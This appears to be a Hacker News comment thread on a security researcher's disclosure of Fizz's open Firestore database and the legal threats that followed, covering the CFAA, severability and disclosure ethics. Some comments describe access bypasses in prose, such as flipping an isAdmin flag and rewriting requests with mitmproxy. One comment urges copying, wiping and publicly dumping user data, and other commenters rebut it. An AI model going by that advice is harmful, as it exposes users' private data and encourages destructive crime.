> At the time, Fizz used Google’s Firestore database product to store data including user information and posts. Firestore can be configured to use a set of security rules in order to prevent users from accessing data they should not have access to. However, Fizz did not have the necessary security rules set up, making it possible for anyone to query the database directly and access a significant amount of sensitive user data.
> We found that phone numbers and/or email addresses for all users were fully accessible, and that posts and upvotes were directly linkable to this identifiable information. It was possible to identify the author of any post on the platform.
So AFAICT there is no indication they created any admin accounts to access the data. This is yet another example of an essentially publicly accessible database that holds what was supposed to be private information. This seems like a far less clear application of the CFAA than the pattern of facts you describe.
hnav|2 years ago
jmholla|2 years ago
We all here no, there is no such thing as something 100% secure, but if you're gonna go making wild claim, you should have to stand by them.
TheNewsIsHere|2 years ago
Even if you are engaged in legitimate security research, it is highly unethical and unprofessional to willfully exceed your engagement limits. You may not even know the full reasoning of why those limits are established.
singleshot_|2 years ago
Fizz may have violated more than a state bar rule; this could very well be extortion (depending).
I would tend to agree with the balance of your comments.
whimsicalism|2 years ago
kjjw|2 years ago
[deleted]
jbombadil|2 years ago
I've seen examples of an employee contract, with things like "if any piece of this contract is invalid it doesn't invalidate the rest of the contract". The employer is basically trying to enforce their rules (reasonable), but they have no negative consequences if what they write is not allowed. At most a court deems that piece invalid, but that's it. The onus is on the reader to know (which tends to be a much weaker party).
Same here. Why can a company send a threatening letter ("you'll go 20 years to federal prison for this!!"), when it's clearly false? Shouldn't there be an onus on the writer to ensure that what they write is reasonable? And if it's absurdly and provably wrong, shouldn't there be some negative consequences more than "oh, nevermind"?
mentalpiracy|2 years ago
This concept of severability exists in basically all contracts, and is generally limited to sections that are not fundamental to the nature of the agreement. (The extent of what qualifies as fundamental is, as you said, up to a court to interpret.)
In your specific example of an employee contract, severability actually protects you too, by ensuring all the other covenants of your agreement - especially the ones that protect you as the individual - will remain in force even if a sub section is invalidated. Otherwise, if the whole contract were invalidated, you'd be starting from nothing (and likely out of a job). Some protections are better than zero.
gingerrr|2 years ago
Severability (the ability to "sever" part of a contract, leaving the remainder intact so long as it's not fundamentally a change to the contract's terms) comes from constitutional law and was intended to prevent wholesale overturning of previous precedent with each new case. It protects both parties from squirreling out of an entire legal obligation on a technicality, or writing poison pills into a contract you know won't stand up to legal scrutiny.
If part of the contract is invalidated, they can't leverage it. If that part being invalidated changes the contract fundamentally, the entire contract is voided. What more do you want?
It seems like you're arguing for some sort of punitive response to authoring a bad contract? That seems like a pretty awful idea re: chilling effect on all legal/business relationship formation, and wouldn't that likely impact the weaker parties worse as they have less access to high-powered legal authors? That means that even negotiating wording changes to a contract becomes a liability nightmare for the negotiators, doesn't that make the potential liability burden even more lopsided against small actors sitting across the table from entire legal teams?
I guess I'm having trouble seeing how the world you're imagining wouldn't end up introducing bigger risk for weaker parties than the world we're already in.
MajimasEyepatch|2 years ago
Imagine an employment contract that contains a non-compete clause (ignore, for a moment, your personal beliefs about non-compete clauses). The company may have a single employment contract that they use everywhere, and so in states where non-competes are illegal, the severability clause allows them to avoid having separate contracts for each jurisdiction. And now suppose that a state that once allowed non-competes passes a law banning them: should every employment contract with a non-compete clause suddenly become null and void? Of course not. That's what severability is for.
In the case in the OP, it's hard to say what the context is of the threat, but I imagine something along the lines of, "Unauthorized access to our computer network is a federal crime under statute XYZ punishable by up to 20 years in prison." Scary as hell to a layperson, but it's not strictly speaking untrue, even if most lawyers would roll their eyes and say that they're full of shit. Sure, it's misleading, and a bad actor could easily take it too far, but it's hard to know exactly where to draw the line if lawyers couch a threat in enough qualifiers.
At the end of the day, documents like this are written by lawyers in legalese that's not designed for ordinary people. It's shitty that they threatened some college students with this, and whatever lawyer did write and send this letter on behalf of the company gave that company tremendously poor advice. I guess you could complain to the bar, but it would be very hard to make a compelling case in a situation like this.
(This is also one of the reasons why collective bargaining is so valuable. A union can afford legal representation to go toe to toe with the company's lawyers. Individual employees can't do that.)
bdowling|2 years ago
LastTrain|2 years ago
convolvatron|2 years ago
fallingknife|2 years ago
anigbrowl|2 years ago
treis|2 years ago
hnfong|2 years ago
bagels|2 years ago
f0e4c2f7|2 years ago
Sure you still get some of that today. An especially old fashioned company, or in this case naive college students but overall things have shifted quite dramatically in favor of disclosure. Dedicated middle men who protect security researcher's identities, Large enterprises encouraging and celebrating disclosure, six figure bug bounties, even the laws themselves have changed to be more friendly to security researchers.
I'm sure it was quite unpleasant to go through this for the author, but it's a nice reminder that situations like this are now somewhat rare as they used to be the norm (or worse).
lamontcg|2 years ago
The fact that a lot of companies have embraced bug bounties and encourage this kind of stuff against them unfortunately teaches "kids" that this kind of thing is perfectly legal/moral/ethical/etc.
As this story shows though you're really rolling the dice, even though it worked out in this case.
> Discussions in forums / BBS's would be around if it was safe to disclose at all. Suggestions of anonymous email accounts and that sort of thing.
This is probably still a better idea if you don't have the cooperation of the target of the hack via some stated bug bounty program. But that doesn't help the security researcher "make a name" for themselves.
And you're basically admitting to the fact that you trespassed, even if all you did was the equivalent of walking through an unlocked door and verifying that you could look inside their refrigerator.
The fact that it may play out in the court of public opinion that you were helping to expose the lies of a corporation doesn't change the fact than in the actual courts you are guilty of a crime.
_greim_|2 years ago
formerly_proven|2 years ago
This is still the way to go even in many western countries.
mewse-hn|2 years ago
https://stanforddaily.com/2022/11/01/opinion-fizz-previously...
icameron|2 years ago
That's wild!
iancarroll|2 years ago
A long time ago I was able to get admin access to an electric scooter company by updating my Firebase user to have isAdmin set to true, and then I accidentally deleted the scooter I was renting from Firebase. I am not sure what happened to it after that.
morpheuskafka|2 years ago
You could also bypass the filter preventing searching for over 18 if you are under/under if you are over, and paid-only filters like location, gender, etc. by rewriting the requests with a mitmproxy (paid status is not checked server-side).
gregsadetsky|2 years ago
I imagine a web tool that could take the app id and other api values (that are publicly embedded in frontend apps), optionally support a session id (for those firestore apps that use a lightweight “only visible to logged in users” security rule) and accept names of collections (found in the js code) to explore?
hitekker|2 years ago
mustacheemperor|2 years ago
>Although Fizz released a statement entitled “Security Improvements Regarding Fizz” on Dec. 7, 2021, the page is no longer navigable from Fizz’s website or Google searches as of the time of this article’s publication.
And, it seems likely the app still stores personally identifiable information about its "anonymous" users' activity.
> Moreover, we still don’t know whether our data is internally anonymized. The founders told The Daily last year that users are identifiable to developers. Fizz’s privacy policy implies that this is still the case
I suppose the 'developers' may include the same founders who have refused to comment on this, removed their company's communications about it, and originally leveraged legal threats over being caught marketing a completely leaky bucket as a "100% secure social media app." Can't say I'm in a hurry to put my information on Fizz.
seiferteric|2 years ago
dundarious|2 years ago
vannevar|2 years ago
gruez|2 years ago
1. threatening violence is explicitly a crime
2. at a higher level, threatening violence is a crime because the underlying act (committing violence) is also a crime. threatening to do a legal act is largely legal. it's not illegal to threaten reporting to the authorities, for instance.
charonn0|2 years ago
tantalor|2 years ago
SenAnder|2 years ago
Legally, can this cover talking to e.g. state prosecutors and the police as well? Because claiming to be "100% secure", knowing you are not secure, and your users have no protection against spying from you or any minimally competent hacker, is fraud at minimum, but closer to criminal wiretapping, since you're knowingly tricking your users into revealing their secrets on your service, thinking they are "100% secure".
That this ended "amicably" is frankly a miscarriage of justice - the Fizz team should be facing fraud charges.
SoftTalker|2 years ago
manicennui|2 years ago
We care more about corporations than citizens in the US. Advertising in the US is full of false claims. We ignore this because we pretend like words have no meaning.
pie_R_sqrd|2 years ago
Zone3513|2 years ago
[deleted]
monksy|2 years ago
Fantastic for calling Fizz out. "Fizz did not protect their users’ data. What happened next?" This isn't a "someone hacked them". It's that Fizz failed to do what they promised.
I'm still curious to hear if the vulnerability has been tested to see if it's been resolved.
InSteady|2 years ago
davesque|2 years ago
I don't think this applies to the reporter in this case, but it does seem like there's a bit of a trend in security research lately to capitalize on the publicity of finding a vulnerability for one's own personal branding. That feels a bit disingenuous. Not that the appropriate response would be to threaten someone with legal action.
pie_flavor|2 years ago
It's not about personal branding, it's about protecting the users of the app. Either the app fixes the vulnerability so the users are no longer in danger, or the users are made aware that they are in danger.
Lalabadie|2 years ago
It's completely fine to discuss or request a different disclosure date when communicating with researchers. The delay is their protection against inaction.
Cheezewheel|2 years ago
ryandrake|2 years ago
It's practically a given that the actual security (or privacy) of a software is inversely proportional to its claimed security and how loud those claims are. Also, the companies that pay the least attention to security are always the ones who later, after the breach, say "We take security very seriously..."
simonw|2 years ago
epoch_100|2 years ago
lxe|2 years ago
dfxm12|2 years ago
consoomer|2 years ago
In all honesty, nothing good usually comes from that. If you wanted the truth to be exposed, they would have been better off exposing it anonymously to the company and/or public if needed.
It's one thing to happen upon a vulnerability in normal use and report it. It's a different beast to gain access to servers you don't own and start touching things.
nickdothutton|2 years ago
“Keep calm” and “be responsible” and “speak to a lawyer” are things I class as common sense. The gold nugget I was looking for was the red flashing shipwreck bouy/marker over the names.
meepmorp|2 years ago
https://stanforddaily.com/2022/11/01/opinion-fizz-previously...
hermannj314|2 years ago
Am I to understand you can attempt to hack any computer to gain unauthorized access without prior approval? That doesn't seem legal at all.
Whether or not there was a vulnerability, was the action taken actually legal under current law? I don't see anything indicating for or against in the article. Just posturing that "ethical hacking" is good and saying you are secure when you aren't is bad. None of that seems relevant to the actual question of what the law says.
tptacek|2 years ago
(b) You don't require permission to test software running on hardware you control (absent some contract that says otherwise).
(c) But you're right, in this case, the researchers presumably did need permission to conduct this kind of testing lawfully.
epoch_100|2 years ago
1970-01-01|2 years ago
utopcell|2 years ago
Kudos to Cooper, Miles and Aditya for seeing this through.
gnicholas|2 years ago
SoftTalker|2 years ago
They could threaten to report you to the police or such authorities, but they would have to turn over their evidence to them and to you and open all their relevant records to you via discovery.
> Get a lawyer
Yes, if they're seriously threatening legal action they already have one.
epoch_100|2 years ago
aidenn0|2 years ago
meepmorp|2 years ago
That's not true, depending on where you live in the US. Several states allow private citizens to file criminal charges with a magistrate. IIRC, NJ law allows actual private prosecution of criminal charges, subject to approval by a judge and prosecutor. I think that's a holdover from English common law.
lightedman|2 years ago
That would've been a better legal threat to put on them as a offensive move, instead of using the EFF. "Sure you can attempt to have me jailed but your threat is clear-cut felony extortion. See you in the jail cell right there with me!"
sublinear|2 years ago
Maybe it's because I'm getting old, but it would never cross my mind to take any of this personally.
If they're this bad at security, this bad at marketing, and then respond to a fairly standard vulnerability disclosure with legal threats it's pretty clear they have no idea what they're doing.
Being the "good guy" can sometimes be harder than being the "bad guy", but suppressing your emotions is a basic requirement for being either "guy".
kdmccormick|2 years ago
Yup, that's it :) These kids are either in college or just graduated. They were smart enough to get themselves legal help before saying anything stupid, which is impressive. Cut them some slack!
ngai_aku|2 years ago
And yet, according to the linked article in the Stanford Daily, they received $4.5 million in funding
michaelmrose|2 years ago
This is wholly and obviously illegal but so is the described ethical hacking. You have adopted a complex nuanced strategy to minimize harm to all parties. This is great morally but as far as I can tell its only meaningful legally insofar as it makes folks less likely to go after you nothing about it makes your obviously illegal actions legal so if you are going to openly flout the law it makes sense to put less of a target on your back while you are breaking the law.
unknown|2 years ago
[deleted]
tamimio|2 years ago
xeromal|2 years ago
datacruncher01|2 years ago
Payouts for finding bugs when there isn't an already established process are either not going to be worth your time or will be seen as malicious activity.
causality0|2 years ago
jccalhoun|2 years ago
JakeAl|2 years ago
withinrafael|2 years ago
noam_compsci|2 years ago
winter_blue|2 years ago
The next time someone discovers a company that has poor database security, they should, IMO: (1) make a full copy of confidential user data, (2) delete all data on the server, (3) publish confidential user data on some dumping site; and protect their anonymity while doing all 3 of these.
If these researchers had done (2) and (3) – and done so anonymously, that would have not only protected them from legal threats/harm, but also effectively killed off a company that shouldn't exist – since all of Buzz/Fizz users would likely abandon it as consequence.
jstarfish|2 years ago
Aaron Swartz only did (1). Failing at (4) didn't end so well for him.
I get that you're frustrated but encouraging others to make martyrs of themselves is cowardice. If some dumb kid tries this and their opsec isn't bulletproof, they're fucked. Put your own skin in the game and do it yourself if your convictions are that strong.
AnimalMuppet|2 years ago
It's especially unwise because you now give the company a massive incentive to hire real forensics specialists to try to track you down. You're placing a lot of faith in your ability to remain anonymous under that level of scrutiny.
pc86|2 years ago
dragonwriter|2 years ago
No, it wouldn’t. Anonymity can be penetrated, and the more incentive people have to do so, the more likely it will be.
unknown|2 years ago
[deleted]
wedn3sday|2 years ago
rootusrootus|2 years ago
Is that the clinical term for Internet Tough Guy?
I imagine deleting the DB would almost certainly lead to actual CFAA consequences. Which kinda suck, as I recall.
pityJuke|2 years ago
[0]: https://stanforddaily.com/2022/11/01/opinion-fizz-previously...
justincredible|2 years ago
[deleted]
unknown|2 years ago
[deleted]
helaoban|2 years ago
jerf|2 years ago
Personally, I don't see it as worth it to pursue a company that does not hang out some sort of public permission to poke at them. The upside is minimal and the downside significant. Note this is a descriptive statement, not a normative statement. In a perfect world... well, in a perfect world there'd be no security vulnerabilities to find, but... in a perfect world sure you'd never get in trouble for poking through and immediately backing off, but in the real world this story just happens too often. Takes all the fun right out of it. YMMV.
c4mpute|2 years ago
Nothing else is ethically viable. Nothing else protects the researcher.
Buttons840|2 years ago
This during a time when thousands or millions have their personal data leaked every other week, over and over, because companies don't want to cut into their profits.
Researchers who do the right thing face legal threats of 20 years in prison. Companies who cut corners on security face no consequences. This seems backwards.
Remember when a journalist pressed F12 and saw that a Missouri state website was exposing all the personal data of every teacher in the state (including SSN, etc). He reported the security flaw responsibly and it was embarrassing to the State so the Governor attacked him and legally harassed him. https://arstechnica.com/tech-policy/2021/10/missouri-gov-cal...
I once saw something similar. A government website exposing the personal data of licensed medical professionals. A REST API responded with all their personal data (including SSN, address, etc), but the HTML frontend wouldn't display it. All the data was just an unauthenticated REST call away, for thousands of people in the state. What did I do? I just closed the tab and never touched the site again. It wasn't worth the personal risk to try to do the right thing so I just ignored it and for all I know all those people had their data stolen multiple times over because of this security flaw. I found the flaw as part of my job at the time, I don't remember the details anymore. It has probably been fixed by now. Our legal system made it a huge personal risk to do the right thing, so I didn't do the right thing.
Which brings me to my point. We need strong protections for those who expose security flaws in good faith. Even if someone is a grey hat and has done questionable things as part of their "research", as long as they report their security findings responsibly, they should be protected.
Why have we prioritized making things nice and convenient for the companies over all else? If every American's data gets stolen in a massive breach, it's so sad, but there's nothing we can do (shrug). If one curious user or security research pokes an app and finds a flaw, and they weren't authorized to do so, OMG!, that person needs to go to jail for decades, how dare they press F12!!!1
This is a national security issue. While we continue to see the same stories of massive breaches in the news over and over and over, and some of us get yet another free year of monitoring that credit agencies don't commit libel against us, just remember that we put the convenience of companies above all else. They get to opt-in to having their security tested, and over and over they fail us.
Protect security researchers, and make it legal to test the security of an app even if the owning company does not consent. </rant>
sleepybrett|2 years ago
If that happens the whole calculus of bug bounties changes immediately.
InSteady|2 years ago
kordlessagain|2 years ago
asynchronous|2 years ago
How do devs forget this step before raising 4.5 million in seed funding?
aa_is_op|2 years ago
kjjw|2 years ago
[deleted]
borkt|2 years ago
[deleted]
epoch_100|2 years ago
trostaft|2 years ago
The writing felt fine to me, if a bit terse.
Pannoniae|2 years ago
kjjw|2 years ago
[deleted]
archgoon|2 years ago
[deleted]
wang_li|2 years ago
Buttons840|2 years ago
If a curious kid does a port scan police will smash down doors. People will face decades in prison.
If a negligent company leaks the private data of every single American, well, gee, what could we have done more, we had that one company do an audit and they didn't find anything and, gee, we're just really sorry, so lets all move on and here's a free year of credit monitoring which you may choose to continue paying us for at the end of the free year.
SenAnder|2 years ago
It's effectively legalizing fraud for a big chunk of computer security. Sure fraud itself is technically still illegal, but so is exposing it.
InSteady|2 years ago
My understanding is that these security researchers only accessed their own accounts and data on the cloud servers, and in doing so they did not bypass any "effective technical protections on access."
Thankfully for all of us, the DoJ appears to disagree with your sentiment. At least with the current administration.
Is it your position is that when you are lied to, and your sensitive and personally identifying information is being grossly mishandled by a company, your only recourse is to spend thousands of dollars and incredible amounts of time on a court case that has very little chance of achieving anything?
edwinjm|2 years ago